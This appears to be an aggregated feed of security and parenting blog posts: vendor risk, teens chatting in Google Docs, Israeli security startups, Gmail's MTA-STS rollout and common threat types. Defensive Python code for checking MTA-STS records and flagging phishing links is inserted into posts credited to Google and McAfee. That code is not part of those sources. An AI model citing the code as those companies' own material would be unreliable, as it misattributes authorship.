Before finalising a vendor relationship, it’s crucial to use all the information gathered during your due diligence process to construct a response plan in preparation for any future incidents the vendor might experience. Tracking the assets to which your vendor has access is one component of an effective response plan. Others include courses of action to mitigate exposure, disclosure and notification procedures, external communications strategies, and plans to re-evaluate the vendor’s security and remediation following an incident.
 
The most effective way to manage vendor risk is not to work with any external vendors in the first place, which isn’t a feasible strategy. The most secure and successful vendor relationships are rooted in preparation and transparency. Thoroughly understanding all facets of a vendor’s security program, implementing additional controls as needed to appropriately safeguard your business’s assets, and being prepared to respond to future incidents can go a long way toward reducing business risks associated with any vendor relationship.
Josh Lefkowitz, CEO of Flashpoint

Social Underground: Kids Using Google Docs as New Digital Hangout

Over the years kids have succeeded in staying one step ahead of parents on the digital front. Remember the golden days of social? Teens owned Facebook until every parent, auntie, and grandparent on the planet showed up. So, teens migrated to Instagram, Twitter, and Snapchat hoping to carve out a private patch of land for their tribe. And, according to a report in The Atlantic, the latest app these digital nomads have claimed as a covert hangout surprisingly is Google Docs.

Yes — Google Docs — that boring looking online tool many of us parents use at work to collaborate on projects. Google Docs is perfect when you think about it. The app can be accessed on a tablet, laptop, or as a phone app. It allows multiple users to edit a document at the same time — kind of like an online party or the ultimate private group chat.

To interact, kids can use the chat function or even highlight words or phrases and use a comment bubble to chat. Because teachers use the application in the classroom, kids are using Google Docs to chat during class without getting busted or dupe parents at home into thinking they are doing their homework.

Another big perk: Schools have firewalls that block social networking sites during school hours, but Google Docs is officially cleared for school use.

The Risks

As with any app, what begins as a covert, harmless chat channel between friends can turn malicious quickly as more and more people are invited into a shared document to talk.

Kids can easily share videos, memes, and hurtful, joking, or inappropriate content within a Google Doc. They can gang up on other kids and bully others just as they do on any other social network. Similar to the way images disappear on Snapchat in 24 hours or on Instagram stories, the “resolve” button on the Google Docs chat function allows kids to instantly delete a chat thread if a teacher or parent heads their way or hovers too closely.

Because Google Docs live on the cloud, there’s no need to download or install a piece of software to use or access it. Any device connected to the Internet can access a Google Doc, which means kids can also use it as a digital diary without a digital trail and hide potentially harmful behaviors from parents.

10 Ways to Coach Your Kids Around Digital Safety 

  1. Know where they go. Just as you’d ask your child where he or she is going offline, be aware of their digital destinations online. Check on them during homework hours to be sure they aren’t chatting away their learning time.
  2. Check for other apps. If you’ve grounded your child from his or her smartphone for any reason, and they claim they have online homework to do, check their laptops and tablets for chat apps like Kik, WhatsApp, hidden vault apps, and of course, as we now know, Google Docs.
  3. Remember, it’s forever. Even if an image or video is “resolved” on Google Docs, deleted on Instagram or Twitter, or “vanishes” on Snapchat, the great equalizer is the screenshot. Anyone can take one, and anyone can use it to bully, extort, or shame another person anytime they decide. Remind kids of the responsibility they have with any content they share anywhere online — privacy does not exist.
  4. Sharing is caring. If your child is on Google Docs and you have a hunch they aren’t doing homework, ask them to share their document with you so you can monitor their work. Just hit the big blue “share” button and insert your email address, and you will have immediate access to the homework document.
  5. Keep in touch with teachers. If your child’s grades begin to slip, he or she could be distracted at school. Ask about what apps are used in the classroom and alert the teacher if you think your child might be distracted be it with technology or anything else.
  6. Parental controls. Hey, we’re busy because we’re parents. Enlist some help in monitoring your child’s online activity with parental control software. This will help you block risky sites, limit excessive app use, and give you a report of where your kids spend most of their time online.
  7. Look for red flags. Everyone needs and desires privacy, even your teen. The tough part is discerning when a teen is being private or trying to hide risky behavior. A few red flags to look for include defensiveness when asked about an app or chat activity, turning off a device screen when you come around, and getting angry when you ask to see their screen. Other signs of unhealthy app use are an increase in data use and fatigue at school from lack of sleep.
  8. Connect with other parents. Here’s the snag in the whole plan: the rules that apply to homework and devices at your house may not apply at other people’s homes where kids often study. Bullying or inappropriate online behaviors often take place under other people’s roofs. So get intentional. Keep in touch with other parents. Find common ground on digital values before letting kids go offsite for homework time.
  9. Talk, talk, talk. Your best defense in keeping your kids safe online — be it using apps or other sites — is a strong offense. Talk with your kids often about what they like to do online, what their friends do, and address digital issues immediately.
  10. Be flexible. Parental monitoring is going to look different in every family. Every child is different in maturity, and every parent-child relationship varies greatly. Find a monitoring solution that works for your family. Coming down too hard on your kids could drive them into deeper secrecy while taking a hands-off approach could put them in danger. Try different methods until you find one that fits your family.

Remember: You won’t be able to keep your finger on everything your child is up to online, but you can still have a considerable influence by staying in the know on digital trends and best online safety practices.

The post Social Underground: Kids Using Google Docs as New Digital Hangout appeared first on McAfee Blogs.

Protect Your Privacy Spring Cleaning

I’ll be honest, my blog idea was generated from an article about spring cleaning.  Let’s face it, lots of things could benefit from spring cleaning:  homes, cars, desk drawers… How about your inbox?  Maybe the ever-growing number of presentation drafts in your documents folder?  How about the flash drive in your desk drawer?  Anything in […]

The post Protect Your Privacy Spring Cleaning appeared first on Privacy Ref Blog.

PCI Standards in 2019: Q&A with CTO Troy Leach


What do stakeholders need to know about PCI Security Standards in 2019? PCI SSC Chief Technology Officer Troy Leach provides an update on what to expect for changes to existing standards and a look at those in development this year.  

What to Know About the New Card Production Security Assessor Program


PCI SSC is in the process of launching a new program to train and qualify security professionals to perform assessments using the Card Production Security Standards. Gill Woodcock, Senior Director of Certification Programs, provides an update on this effort and how it will improve the security of payments.

Most Promising Israeli Cybersecurity Startups for 2019

Around 450 cybersecurity companies operate in Israel, constituting 5% of the global cybersecurity market. The Israeli cybersecurity industry was founded in the late 80s, with the establishment of several local companies that developed anti-virus software and information security products. To understand the impact of Israeli companies on the global market, we can mention a few of the well-known Israeli cyber companies: Check Point, Radware, CyberArk, and Imperva.

The cybersecurity industry in Israel, an important part of Israel’s software industry, includes a wide range of companies that protect against cyber warfare and cybercrime. The sector includes companies that have long operated as independent companies, together with start-ups that were sold to foreign companies and continue to operate in Israel as development centers of the acquirers. In the list below we mention the most promising Israeli cybersecurity companies for 2019. We’ve created this list to give an overview of the startups that our industry needs to track and be aware of. The companies below operate in Israel or were founded by Israelis, and all are award-winning companies. To see the full list of Israeli cybersecurity companies please check our database.

Our list of Most Promising Israeli Cybersecurity Startups for 2019

XM Cyber

In order to prevent cyber-attacks, organizations should identify in advance attack vectors that hackers will utilize to compromise their critical assets. Moreover, security holes should be remediated as soon as they are created and before attackers utilize them.

XM Cyber’s multi-award-winning breach and attack simulation (BAS) platform continuously identifies attack vectors and prioritizes remediation. The platform provides organizations with a clear understanding, at any given time, of where and how hackers will compromise their crown jewels. XM Cyber was founded by executives from the Israeli cyber intelligence community and has offices in the US, UK, Israel and Australia.


Silverfort

Corporate networks are going through dramatic changes due to IT revolutions like cloud, IoT and BYOD. With countless devices and services connected to each other without clear perimeters, users must be authenticated before accessing any sensitive resources.

Silverfort delivers strong authentication across complex corporate networks and cloud environments, without requiring any software agents, proxies or local configurations. Silverfort seamlessly enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, homegrown applications, critical infrastructure and more. Silverfort enables enterprises to prevent data breaches, comply with regulatory requirements and migrate sensitive assets securely to the cloud.


Sixgill

Cybersecurity companies often rely on manual or semi-automatic processes to gather and analyze intelligence, creating a lengthy, expensive and ineffective intelligence cycle that fails to mitigate threats.

Founded in 2014, Sixgill provides cyber threat intelligence solutions based on exclusive access to deep and dark web sources, to enterprises around the world including Fortune 500 companies, financial institutions, and law enforcement agencies.

In 2017, Sixgill was awarded a “Top 10 Most Innovative and Promising Companies of the World” at the Netexplo/UNESCO Paris conference and was included in the Disrupt 100. In 2016, Sixgill was named one of the “Top 5 Most Innovative Companies” at CyberTech Tel Aviv.


Salt Security

Salt Security protects the APIs at the core of every SaaS, web, mobile, microservices and IoT application. Its API Protection Platform is the first patented solution to prevent the next generation of API attacks, using behavioral protection. Deployed in minutes, the AI-powered solution automatically and continuously discovers and learns the granular behavior of APIs and requires no configuration or customization to ensure API protection.

The company was founded in 2016 by alumni of the Israeli Defense Forces (IDF) and serial executives in cybersecurity and in 2019 was selected as a finalist for the RSA Innovation Sandbox.


Intezer

Intezer’s Genetic Malware Analysis technology identifies code reuse among trusted and malicious software to detect advanced cyber threats. The technology determines whether a file is trusted or malicious, while also classifying the malicious file to its relevant malware family and providing information about the level of sophistication and the threat actor behind the attack, within seconds. The company also offers a free community edition where users can detect code reuse to obtain insights about malware families and threat actors.
Fortune 500 companies leverage Intezer to automate their malware analysis and classification and reduce false positives — improving security operations and accelerating incident response. The company’s technology has provided crucial insights into several high-profile cyber attacks ahead of leading engines and government agencies, including APT28, MirageFox, NotPetya and WannaCry.

Intezer was named a Cybersecurity Excellence Awards 2019 winner for Best Cybersecurity Company and a Cyber Defense Magazine Infosec 2019 award winner for Cutting Edge Malware Analysis and Incident Response. The company was also named an SC Awards USA finalist in the category of Newcomer Security Company of the Year.


Protego

Serverless applications require unique security solutions. Founded in 2017, Protego’s comprehensive SaaS solution helps organizations embrace serverless technology securely.

The Platform:

· Saves developers & DevSecOps time by automating application hardening & governance within existing pipelines.

· Provides CloudAppSec with serverless app visibility & seamless run-time security with function self protection.

Protego won the 2019 Cybersecurity Excellence Awards for Best Startup and was named a 2019 Company to Watch by SDTimes Magazine. In 2018, Protego won an Innovator Award from SC Magazine, received Frost & Sullivan’s Global New Product Innovation Award, and won most innovative initiative at the CyberTech Tel Aviv Conference.


Sepio

Sepio is disrupting the cyber-security industry by uncovering hidden hardware attacks. Sepio Prime provides security teams with full visibility into their hardware assets and their behavior in real time. A comprehensive policy enforcement module allows administrators to easily define granular device usage rules and continuously monitor and protect their infrastructure. Leveraging a combination of physical fingerprinting technology together with device behavior analytics, Sepio’s software-only solution offers instant detection and response to any threat or breach attempt coming from a manipulated or infected element.

Sepio Systems was recently awarded Frost & Sullivan’s Best Practice and Technology Leadership award for the RDM (Rogue Device Mitigation) market.


Reblaze

Founded in 2012, Reblaze is a cloud-based, fully managed protective shield for sites and web applications. Hostile traffic is blocked in the cloud, before it reaches the protected network.
Reblaze is a comprehensive web security solution, providing a next-gen WAF, DoS and DDoS protection, bot mitigation, scraping prevention, CDN, load balancing, and more.
The platform offers a unique combination of benefits. Machine learning provides accurate, adaptive threat detection. Dedicated Virtual Private Clouds ensure maximum privacy. Top-tier infrastructure assures maximum performance. Fine-grained ACLs enable precise traffic regulation. An intuitive web-based management console provides real-time traffic control. A one-month trial offer allows you to assess Reblaze with no cost, risk, or obligation.


Regulus Cyber

Regulus Cyber offers defense for sensors used in automotive, maritime and aviation systems.
It is the first company focusing entirely on sensor security solutions that protect commonly used sensors in both manned and unmanned systems. Its product, Pyramid, offers real-time protection against jamming and spoofing attacks.
These attacks can disable or hack sensors such as GNSS, LiDAR, radar and other mission-critical components.
Regulus Pyramid has won several awards, including 1st place in the AUVSI Excellence cybersecurity category and The Cyberstorm Startup Competition, and has received $6.3 million in funding from leading VCs in Israel and Silicon Valley.


Morphisec

Morphisec fundamentally changes the cybersecurity scene by shifting the advantage to defenders, keeping them ahead of attacks with moving target defense.

Emerging from the national cyber security center and from some of the sharpest cyber security minds in Israel, Morphisec provides the ultimate threat prevention by making sure attackers never find the targets they seek.

 


This was our latest list of the most promising Israeli cybersecurity startups for 2019. We hope that you will find what you need. Feel free to contact us if you want to add a company to our list.

The post Most Promising Israeli Cybersecurity Startups for 2019 appeared first on CyberDB.

D.C. Area Crypto Day – Spring 2019

D.C. Area Crypto Day is a bi-annual, one-day regional meeting of cryptographic researchers to promote research collaborations and disseminate fresh, state-of-the-art results in cryptography. Previous D.C.

You Can Now Get This Award-Winning VPN For Just $1/month

If you use the internet (which you clearly do), you likely know how important it is to protect your data in an increasingly dangerous cyber environment. But like other essential tasks that tend to be tedious (like filing taxes early and brushing your teeth for the full two minutes), installing and running a VPN can sound unappealing to many: sure, they encrypt your internet traffic and hide your location — but they can also run frustratingly slowly, delaying the way you’d usually use the internet for entertainment and work.

That’s where Ivacy VPN is different: not only will the speedy service let you browse and stream lag-free, it also offers real-time threat detection technology, removing malware and viruses at the server level. It ensures that all your downloads and devices stay totally secure, so you can stay safe online without being inconvenienced.


Gmail making email more secure with MTA-STS standard



We’re excited to announce that Gmail will become the first major email provider to follow the new SMTP MTA Strict Transport Security (MTA-STS) RFC 8461 and SMTP TLS Reporting RFC 8460 internet standards. These new email security standards are the result of three years of collaboration within the IETF, with contributions from Google and other large email providers.

SMTP alone is vulnerable to man-in-the-middle attacks

Like all mail providers, Gmail uses Simple Mail Transfer Protocol (SMTP) to send and receive mail messages. SMTP alone only provides best-effort security with opportunistic encryption, and many SMTP servers do not prevent certain types of malicious attacks intercepting email traffic in transit.

SMTP is therefore vulnerable to man-in-the-middle attacks. Man-in-the-middle is an attack where communication between two servers is intercepted and possibly changed without detection. Real attacks and prevention were highlighted in our research published in November 2015. MTA-STS will help prevent these types of attacks.

MTA-STS uses encryption and authentication to reduce vulnerabilities

An MTA-STS policy for your domain means that you request external mail servers sending messages to your domain to verify that the SMTP connection is authenticated with a valid public certificate and encrypted with TLS 1.2 or higher. This can be combined with TLS reporting, which means your domain can request daily reports from external mail servers with information about the success or failure of emails sent to your domain according to the MTA-STS policy.

Gmail is starting MTA-STS adherence. We hope others will follow

Gmail is the first major provider to follow the new standard, initially launching in Beta on April 10th 2019. This means Gmail will honor MTA-STS and TLS reporting policies when sending emails to domains that have defined these policies. We hope many other email providers will soon adopt these new standards that make email communications more secure.

Email domain administrators should set up DNS records and a web server endpoint to configure MTA-STS and TLS reporting policies for incoming emails. Use our Help Center to find out how to set up an MTA-STS policy with your DNS server. G Suite admins can use the G Suite Updates blog to see what MTA-STS means for G Suite domains.
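As an added example that is not part of the Google post: a small Python checker for the three pieces a receiving domain publishes under these standards, written against RFC 8461 (MTA-STS) and RFC 8460 (TLS-RPT). It shows where the DNS records and the policy file live, validates their syntax, applies the RFC 8461 MX-matching rule (including the one-label wildcard), and shows what a policy-aware sender does when the MX, TLS or certificate check fails in enforce versus testing mode. The domain example.com, the records and the report address are constructed sample values, not real deployments.

```python
import re

# Constructed sample records for a hypothetical domain "example.com" (not from the post).
# The TXT record lives at _mta-sts.example.com; the policy body is served from
# https://mta-sts.example.com/.well-known/mta-sts.txt; TLS-RPT lives at _smtp._tls.example.com.
STS_TXT = "v=STSv1; id=20190410T000000;"
POLICY_FILE = """version: STSv1
mode: enforce
mx: mail.example.com
mx: *.mx.example.net
max_age: 604800
"""
TLSRPT_TXT = "v=TLSRPTv1; rua=mailto:tls-reports@example.com"


def record_locations(domain):
    """Where a sending MTA looks for a domain's MTA-STS and TLS-RPT data (RFC 8461 s3, RFC 8460 s3)."""
    return {
        "sts_txt": f"_mta-sts.{domain}",
        "policy_url": f"https://mta-sts.{domain}/.well-known/mta-sts.txt",
        "tlsrpt_txt": f"_smtp._tls.{domain}",
    }


def _parse_kv(txt):
    """Split a 'k=v; k=v' style TXT record into a dict."""
    fields = {}
    for part in txt.split(";"):
        if part.strip():
            key, _, value = part.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def parse_sts_txt(txt):
    """Validate the _mta-sts TXT record: version tag plus a 1-32 character alphanumeric id."""
    fields = _parse_kv(txt)
    if fields.get("v") != "STSv1":
        raise ValueError("not an STSv1 record")
    if not re.fullmatch(r"[A-Za-z0-9]{1,32}", fields.get("id", "")):
        raise ValueError("id must be 1-32 alphanumeric characters")
    return fields


def parse_tlsrpt(txt):
    """Validate the TLS-RPT record; rua may carry several comma-separated report URIs."""
    fields = _parse_kv(txt)
    if fields.get("v") != "TLSRPTv1" or not fields.get("rua"):
        raise ValueError("TLS-RPT record needs v=TLSRPTv1 and a rua")
    fields["rua"] = [u.strip() for u in fields["rua"].split(",")]
    return fields


def parse_policy(text):
    """Parse and sanity-check the mta-sts.txt body (RFC 8461 s3.2)."""
    policy = {"mx": []}
    for line in text.splitlines():
        if not line.strip():
            continue
        key, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed policy line: {line!r}")
        key, value = key.strip(), value.strip()
        if key == "mx":
            policy["mx"].append(value.lower())
        else:
            policy[key] = value
    if policy.get("version") != "STSv1":
        raise ValueError("policy version must be STSv1")
    if policy.get("mode") not in ("enforce", "testing", "none"):
        raise ValueError("mode must be enforce, testing or none")
    if not str(policy.get("max_age", "")).isdigit() or int(policy["max_age"]) > 31557600:
        raise ValueError("max_age must be an integer of at most 31557600 seconds")
    policy["max_age"] = int(policy["max_age"])
    if policy["mode"] != "none" and not policy["mx"]:
        raise ValueError("an enforce/testing policy needs at least one mx entry")
    return policy


def mx_matches(policy, mx_host):
    """RFC 8461 s4.1 matching: exact host, or '*.suffix' matching exactly one leading label."""
    host = mx_host.lower().rstrip(".")
    for pattern in policy["mx"]:
        if pattern.startswith("*."):
            suffix = pattern[1:]  # keep the leading dot, e.g. ".mx.example.net"
            prefix = host[: -len(suffix)] if host.endswith(suffix) else None
            if prefix and "." not in prefix:
                return True
        elif host == pattern:
            return True
    return False


def delivery_decision(policy, mx_host, tls_ok, cert_valid_for_mx):
    """What a policy-aware sender does with one MX candidate (RFC 8461 s5)."""
    if mx_matches(policy, mx_host) and tls_ok and cert_valid_for_mx:
        return "deliver"
    if policy["mode"] == "enforce":
        return "refuse"  # never fall back to cleartext: queue or bounce, and report via TLS-RPT
    return "deliver-and-report"  # testing/none: deliver anyway, but record the failure
```

Run the parsers over your own published records before switching from `testing` to `enforce`: a typo in an `mx` line of an enforce-mode policy means compliant senders such as Gmail will refuse to deliver to you rather than fall back, and the TLS-RPT reports are where that failure will show up first.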

5 Most Common Types of Threats You Need to Know About

Cyber threats sometimes feel unrelenting and are becoming more dangerous every day. While the internet presents users with lots of information and services, it also includes several risks. Cyberattacks are increasing in sophistication and volume, with many cybercriminals using a combination of different types of attacks to accomplish a single goal. Though the list of potential threats is extensive, below you’ll see the most common security threats you should look out for.

1. Malware

Short for “malicious software,” malware comes in several forms and can cause serious damage to a computer or corporate network. There are various forms of malware ranging from viruses and worms to Trojans and beyond. Malware is often seen as a catch-all term that refers to any software designed to cause damage to a computer, server, or network.

Antivirus software is the best-known product for protecting your personal devices against malware and is a great start toward preventing potential threats. For enterprises, protecting your endpoints is essential to quickly detect, prevent, and correct advanced threats to your business.

2. Computer Worm:

The distinctive trait of a worm is that it can self-replicate and doesn’t require human interaction to create copies and spread quickly and in great volume. Most worms spread through tricking internet users and are designed to exploit known security holes in software. Since many employees use their phones for work-related tasks when they are not within the perimeter of their corporate firewall, businesses are at a high risk for potential worms. If a machine is infected, the worm can corrupt files, steal sensitive data, install a backdoor giving cybercriminals access to your computer, or modify system settings to make your machine more vulnerable.

3. Spam:

Spam refers to unsolicited messages in your email inbox. From the sender’s perspective, spam is a great way to get their message across in an efficient and cost-effective way. While spam is usually considered harmless, some messages include links that will install malicious software on your computer if you click on them.

How do you recognize malicious spam? First off, if you don’t recognize the sender’s address, don’t open it. Also, if the email addresses you in a generic way, i.e. “Dear customer”, “Hi there” etc., don’t engage. Be wary of embedded links and check whether they have odd URLs by hovering over them to see where they want to direct you and whether the destination URL matches the site you expect.
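The hover check above can be automated for a mail gateway or a user's own inbox rules. The following is an added example, not code from the McAfee post: it parses the HTML body of a message, collects every link with its visible text, and flags links whose real destination host is outside the organisation the reader expects, or whose visible text names a different domain than the href actually points to. The message body, the bank name examplebank.com and the decoy host are constructed sample values.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message body, not from the post. The first link's visible text names the
# expected bank domain, but its href points to a look-alike host on another domain.
SAMPLE_EMAIL = """
<p>Dear customer,</p>
<p>Please <a href="http://login.examplebank.com.example.net/verify">verify your account
at www.examplebank.com</a> within 24 hours.</p>
<p>Questions? Visit our <a href="https://www.examplebank.com/help">help page</a>.</p>
"""

# Something that looks like a hostname inside the visible link text.
DOMAIN_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            # Collapse whitespace so text wrapped across lines compares cleanly.
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def registrable(host):
    """Crude organisation-level domain: the last two labels. Fine for .com/.net samples;
    a production tool would use the Public Suffix List so that co.uk and similar work."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def suspicious_links(html, expected_domain):
    """Return the links whose real destination does not match what the reader is led to expect."""
    collector = LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        host = urlparse(href).hostname or ""
        reasons = []
        if registrable(host) != expected_domain.lower():
            reasons.append(f"href goes to {host}, not {expected_domain}")
        for shown in DOMAIN_RE.findall(text):
            if registrable(shown) != registrable(host):
                reasons.append(f"link text shows {shown} but href goes to {host}")
        if reasons:
            findings.append({"href_host": host, "text": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in suspicious_links(SAMPLE_EMAIL, "examplebank.com"):
        print(finding["href_host"], "->", "; ".join(finding["reasons"]))
```

The two checks are deliberately separate: the first catches links that leave the expected organisation at all, the second catches the specific trick of showing one domain in the link text while sending the reader elsewhere, which is what hovering over a link reveals by hand.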

4. Phishing

Created by cybercriminals attempting to solicit private or sensitive information, phishing schemes tend to be the starting point of nearly all successful cyberattacks. Phishing schemes can disguise themselves in many forms, whether posing as your bank or a common web service, with the sole purpose of luring you into clicking links and asking you to verify account details, personal information, or passwords. Many people still associate phishing threats with emails, but the threat has evolved beyond your inbox. Hackers are now employing text messages, phone calls, phony apps, and social media quizzes to trick an unwitting victim.

5. Botnet:

A botnet is a network of computers that have been hijacked or compromised by malware, giving hackers the ability to control the infected computers or mobile devices remotely. When the malware is launched on your computer or mobile device, it recruits your infected device into a botnet, and the hacker is then able to control your device and access all your data in the background without your knowledge.

A botnet can consist of as few as ten computers or hundreds of thousands, and when bots come together, they are a force to be reckoned with. If a botnet hits your corporate website, it can make millions of requests at once ultimately overloading the servers knocking the website offline, slow web traffic, or affect performance. As many businesses are aware, a website that is offline or has a long lag time can be very costly, resulting in a loss of customers or a damaged reputation.

 

For more information check out our Security Awareness Resources and Reports.

The post 5 Most Common Types of Threats You Need to Know About appeared first on McAfee Blogs.

On World Health Day, Give Your Children the Key to Good Digital Health

My morning walk route takes me past a school that usually has its assembly at 7:00 am. I catch glimpses of students praying, reading out the news, teachers giving talks and often stop to watch them do their morning drill. It’s an arresting sight – 500 kids in bright uniforms moving in a synchronized manner to drumbeats. The school is doing it right; light exercises before the start of the academic day helps to enhance positivity, concentration power, alertness and readiness to learn. After all it’s an age-old saying, ‘A healthy mind resides in a healthy body.’

Perhaps you are wondering why McAfee Cybermum is discussing health. Well, 7th April was World Health Day and what better time than this to have a heart-to-heart on good health, especially, good digital health?

Let’s accept it- we are parents, first and foremost, and our focus is always (even when we are sleeping or partying or just chilling) on our kids. All we want is to raise happy, well-adjusted kids who will be able to think rationally and act for themselves and know how to stay safe- both in the real and in the digital world.

When we were kids, outdoors was the place to be! Life centered around our gardens, parks and roads outside our houses; where we spent hours playing, chatting or just hanging around. Today’s digital kids also play and socialize a lot, but the bulk of it happens online. They have their favourite hanging out zones, gaming sites, digital libraries, social media etc. We all are quite tech-savvy and so, we are well aware how addictive digital activities can be as well as how the long hours spent online can have adverse effects on health and mind. This is why we worry when our kids prefer digital lives to the real one; we take measures like setting device-use rules and see red if the rules are breached.

But losing our cool isn’t the solution- we need to promote a balanced digital life, right from the day the little tykes mark their initiation into the digital world and educate them and act as their digital role models.

Here’s how you can ensure a healthy digital life for your kids:

Health is wealth

Play games, swim, run, exercise, go for treks! It’s also a good opportunity to show them that devices can be put to other uses besides gaming and socializing, viz; tracking activity and monitoring health statistics. When they are using devices, teach them the right postures so that they don’t strain their back or eyes.

Balance is the keyword

Often, we forget to practice what we preach- which, in this case, is to have some device-free hours. Keep your device away (a) when with family, (b) when there’s company, and (c) during bedtime. Children will protest and perhaps bawl, but will also learn a valuable lesson, rather two lessons – There are other sources of entertainment besides devices, and a NO means NO. While the first lesson is important to lead a balanced digital life, the second one is important for them in the real world too.

Fix up an activity schedule that includes household chores

Not only will this help to maintain digital balance, it will also give the child the first lesson in responsibility. Whether it is making their own beds, cleaning out their wardrobes or helping to wash the car or set the table, these are values you are teaching kids non-verbally. Even little tykes can do small tasks and trust me, it will make them feel proud. Just take care that the daily timetable doesn’t start resembling an army cadet’s training schedule.

Set clear-cut rules

This helps kids learn discipline. Stress on how excessive use is akin to misuse. Their daily schedule should specify timings for device use. If they breach the timings, bring it up immediately. Repeated breaches need to be tackled firmly. Maybe the privilege of using the device needs to be surrendered for a few days. This, you as a parent need to decide.

Let them know you will be remotely monitoring their activities

It’s recommended that you mentor kids in the digital world till they are mature enough to handle matters responsibly themselves. Use parental controls that come with comprehensive security tools like McAfee Total Protection or McAfee LiveSafe and keep the admin password a secret. BUT LET YOUR KIDS KNOW you would be supervising them online. Explain it’s similar to how you keep an eye on them at public places. Remember to set internet timings and filters.

Have purposeful family activity time

Use that evening hour before or after dinner to chat, play board games, tell stories or discuss the news. Share, play, connect- the perfect ingredients for a close-knit family! And of course, all devices, including the digital assistant, are off-limits during this time.

Teach kids to be upstanders

Online abuse can lead to emotional disturbances in vulnerable kids. Even adults are negatively affected by cyberbullying and trolling and so you can understand the impact of such behavior on kids. Give your kids the security of your love and trust so that they grow up to be strong and confident and can stand up against bullies.

Discuss cybersafety often and with due seriousness

Living in the connected age, where we all use the same router for our devices along with other smart devices like CCTV, digital assistants etc., it is important to reinforce how the carelessness of one can affect the safety and privacy of all other family members. A safe and secure net connection is needed for mental wellness.

So, what are you waiting for? Start working on your family’s digital health today!

The post On World Health Day, Give Your Children the Key to Good Digital Health appeared first on McAfee Blogs.

What you don’t know may (pleasantly) surprise you

Today I find myself in Louisville, KY performing a privacy assessment for a client. When visiting clients to perform an assessment, I meet with team members from all parts of the organization. Usually, I am accompanied by someone from the privacy office or legal team. Frequently, my escorts learn something new about the business and […]

The post What you don’t know may (pleasantly) surprise you appeared first on Privacy Ref Blog.

Cyber Security: Three Parts Art, One Part Science

As I reflect upon my almost 40 years as a cyber security professional, I think of the many instances where the basic tenets of cyber security—those we think have common understanding—require a lot of additional explanation. For example, what is a vulnerability assessment? If five cyber professionals are sitting around a table discussing this question, you will end up with seven or eight answers. One will say that a vulnerability assessment is vulnerability scanning only. Another will say an assessment is much bigger than scanning, and addresses ethical hacking and internal security testing. Another will say that it is a passive review of policies and controls. All are correct in some form, but the answer really depends on the requirements or criteria you are trying to achieve. And it also depends on the skills and experience of the risk owner, auditor, or assessor. Is your head spinning yet? I know mine is! Hence the “three parts art.”

There is quite a bit of subjectivity in the cyber security business. One auditor will look at evidence and agree you are in compliance; another will say you are not. If you are going to protect sensitive information, do you encrypt it, obfuscate it, or segment it off and place it behind very tight identification and access controls before allowing users to access the data? Yes. As we advise our client base, it is essential that we have all the context necessary to make good risk-based decisions and recommendations.

Let’s talk about Connection’s artistic methodology. We start with a canvas that has the core components of cyber security: protection, detection, and reaction. By addressing each of these three pillars in a comprehensive way, we ensure that the full conversation around how people, process, and technology all work together to provide a comprehensive risk strategy is achieved.

Protection:

People
Users understand threat and risk, and know what role they play in the protection strategy. For example, if you see something, say something. Don’t let someone surf in behind you through a badge check entry. And don’t think about trying to shut off your end-point anti-virus or firewall.

Process
Policies are established, documented, and socialized. For example, personal laptops should never be connected to the corporate network. Also, don’t send sensitive information to your personal email account so you can work from home.

Technology
Some examples of the barriers used to deter attackers and breaches are edge security with firewalls, intrusion detection and prevention, sandboxing, and advanced threat detection.

Detection:

The mean time to identify an active incident in a network is 197 days. The mean time to contain an incident is 69 days.

People
Incident response teams need to be identified and trained, and all employees need to be trained on the concept of “if you see something, say something.” Detection is a proactive process.

Process
What happens when an alert occurs? Who sees it? What is the documented process for taking action?

Technology
What is in place to ensure you are detecting malicious activity? Is it configured to ignore noise and only alert you of a real event? Will it help you bring that 197-day mean time to detection way down?

Reaction:

People
What happens when an event occurs? Who responds? How do you recover? Does everyone understand their role? Do you War Game to ensure you are prepared WHEN an incident occurs?

Process
What is the documented process to reduce the Kill Chain—the mean time to detect and contain—from 69 days to 69 minutes? Do you have a Business Continuity and Disaster Recovery Plan to ensure the ability to react to a natural disaster, significant cyber breach such as ransomware, DDoS, or—dare I say it—a pandemic?

Technology
What cyber security consoles have been deployed that allow quick access to patch a system, change a firewall rule, switch ACL, or policy setting at an end point, or track a security incident through the triage process?

All of these things are important to create a comprehensive InfoSec Program. The science is the technology that will help you build a layered, in-depth defense approach. The art is how to assess the threat, define and document the risk, and create a strategy that allows you to manage your cyber risk as it applies to your environment, users, systems, applications, data, customers, supply chain, third party support partners, and business process.

More Art: Are You a Risk Avoider or Risk Transference Expert?

A better way to state that is, “Do you avoid all risk responsibility or do you give your risk responsibility to someone else?” Hint: I don’t believe in risk avoidance or risk transference.

Yes, there is an art to risk management. There is also science if you use, for example, the Carnegie Mellon risk tools. But a good risk owner and manager documents risk, prioritizes it by risk criticality, turns it into a risk register or roadmap plan, remediates what is necessary, and accepts what is reasonable from a business and cyber security perspective. Oh, by the way, those same five cyber security professionals we talked about earlier? They have 17 definitions of risk.

As we wrap up this conversation, let’s talk about the importance of selecting a risk framework. It’s kind of like going to a baseball game and recognizing that the program helps you know the players and the stats. What framework will you pick? Do you paint in watercolors or oils? Are you a National Institute of Standards and Technology (NIST) artist, an International Organization for Standardization (ISO) artist, or have you developed your own framework like the Nardone puzzle chart? I developed this several years ago when I was the CTO/CSO of the Commonwealth of Massachusetts. It has been artistically enhanced over the years to incorporate more security components, but it is loosely coupled to the NIST 800-53 and ISO 27001 standards.

